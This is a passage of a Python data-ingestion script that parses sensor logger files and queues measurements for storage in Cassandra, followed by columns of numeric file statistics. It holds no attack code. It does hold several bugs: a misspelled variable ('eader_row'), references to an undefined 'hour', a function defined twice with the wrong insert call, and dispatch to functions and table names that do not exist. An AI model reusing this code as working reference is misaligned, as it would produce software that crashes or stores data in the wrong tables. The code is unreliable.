insert_to_ten_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_ten_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_ten_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_five_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_five_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_five_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_five_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
eader_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_five_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_five_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_five_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_one_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_one_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_one_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
year, week_number, weekday = ts.isocalendar()
week_first_day = (datetime.datetime.strptime('{} {} 1'.format(year, week_number), '%Y %W %w')).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, week_first_day, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
year, week_number, weekday = ts.isocalendar()
week_first_day = (datetime.datetime.strptime('{} {} 1'.format(year, week_number), '%Y %W %w')).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, week_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_sec_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_one_sec_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_one_sec_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_one_sec_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
date_dt = datetime.datetime(ts.year, ts.month, ts.day).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, date_dt, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_sec_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_sec_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
date_dt = datetime.datetime(ts.year, ts.month, ts.day).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, date_dt, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_one_sec_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_daily_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(day.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_daily_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_hourly_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_hourly_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_twenty_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_thirty_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_twenty_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_twenty_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_fifteen_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_fifteen_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_ten_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_ten_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_five_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_five_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_min_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
year, week_number, weekday = ts.isocalendar()
week_first_day = (datetime.datetime.strptime('{} {} 1'.format(year, week_number), '%Y %W %w')).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, week_first_day, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_one_min_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_one_sec_single_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
date_dt = datetime.datetime(ts.year, ts.month, ts.day).strftime("%Y-%m-%d")
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, date_dt, int(ts.timestamp()) * 1e3, min_value, avg_value, max_value, unit))
insert_to_one_sec_single_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def run_update(config_file, args):
file = config_file[args.station][args.file]
num_of_new_rows = 0
if (file.get('table') == 'daily_single_measurements_by_sensor'):
num_of_new_rows = process_daily_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'hourly_single_measurements_by_sensor'):
num_of_new_rows = process_hourly_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'thirty_min_single_measurements_by_sensor'):
num_of_new_rows = process_thirty_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'twenty_min_single_measurements_by_sensor'):
num_of_new_rows = process_twenty_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'fifteen_min_single_measurements_by_sensor'):
num_of_new_rows = process_fifteen_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'ten_min_single_measurements_by_sensor'):
num_of_new_rows = process_ten_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'five_min_single_measurements_by_sensor'):
num_of_new_rows = process_five_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_min_single_measurements_by_sensor'):
num_of_new_rows = process_one_min_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_sec_single_measurements_by_sensor'):
num_of_new_rows = process_one_sec_single_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'daily_profile_measurements_by_sensor'):
num_of_new_rows = process_daily_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'hourly_profile_measurements_by_sensor'):
num_of_new_rows = process_hourly_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'thirty_min_profile_measurements_by_sensor'):
num_of_new_rows = process_thirty_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'twenty_min_profile_measurements_by_sensor'):
num_of_new_rows = process_twenty_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'fifteen_profile_measurements_by_sensor'):
num_of_new_rows = process_fifteen_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'ten_profile_measurements_by_sensor'):
num_of_new_rows = process_ten_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'five_min_profile_measurements_by_sensor'):
num_of_new_rows = process_five_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_min_profile_measurements_by_sensor'):
num_of_new_rows = process_one_min_profile_measurements_by_sensor(args.station, file)
elif (file.get('table') == 'one_sec_profile_measurements_by_sensor'):
num_of_new_rows = process_one_sec_profile_measurements_by_sensor(args.station, file)
if args.track:
if num_of_new_rows > 0:
first_line_num = file.get('first_line_num', 0)
new_line_num = first_line_num + num_of_new_rows
logger_info.info("Updated up to line number {num}".format(num=new_line_num))
config_file[args.station][args.file]['first_line_num'] = new_line_num
logger_info.info("Done processing table {table}".format(table=file.get('table')))
if args.track:
logger_info.info("Updating config file.")
utils.save_config(APP_CONFIG_PATH, config_file)
def main():
"""Parses and validates arguments from the command line. """
parser = argparse.ArgumentParser(
prog='CassandraFormatter',
description='Program for formatting and storing logger data to Cassandra database.'
)
parser.add_argument('-s', '--station', action='store', dest='station',
help='Station to process.')
parser.add_argument('-f', '--file', action='store', dest='file',
help='File to process.')
parser.add_argument(
'-t', '--track',
help='Track file line number.',
dest='track',
action='store_true',
default=False
)
args = parser.parse_args()
if not args.station or not args.file:
parser.error("--station and --file is required.")
app_cfg = utils.load_config(APP_CONFIG_PATH)
run_update(app_cfg, args)
if __name__=='__main__':
main()
| 52.509963
| 286
| 0.706357
| 9,989
| 71,151
| 4.62709
| 0.018721
| 0.050736
| 0.058416
| 0.04907
| 0.975227
| 0.972782
| 0.970078
| 0.96839
| 0.966508
| 0.957443
| 0
| 0.002214
| 0.187475
| 71,151
| 1,354
| 287
| 52.548744
| 0.797274
| 0.013788
| 0
| 0.843996
| 0
| 0
| 0.116875
| 0.02719
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033304
| false
| 0
| 0.022787
| 0
| 0.087642
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
